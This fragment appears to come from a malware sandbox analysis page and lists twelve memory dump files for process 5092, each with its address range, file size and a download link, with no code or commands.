    • memory/5092-41-0x0000000008AA0000-0x0000000009044000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/5092-40-0x0000000007860000-0x0000000007882000-memory.dmp

      Filesize

      136KB

      Download

    • memory/5092-39-0x00000000078D0000-0x0000000007966000-memory.dmp

      Filesize

      600KB

      Download

    • memory/5092-38-0x0000000006BA0000-0x0000000006BBA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/5092-37-0x0000000007E70000-0x00000000084EA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/5092-36-0x0000000006650000-0x000000000669C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/5092-35-0x0000000006620000-0x000000000663E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/5092-33-0x0000000005FF0000-0x0000000006344000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/5092-23-0x0000000005E80000-0x0000000005EE6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5092-22-0x0000000005E10000-0x0000000005E76000-memory.dmp

      Filesize

      408KB

      Download

    • memory/5092-20-0x00000000056F0000-0x0000000005D18000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/5092-19-0x0000000005050000-0x0000000005086000-memory.dmp

      Filesize

      216KB

      Download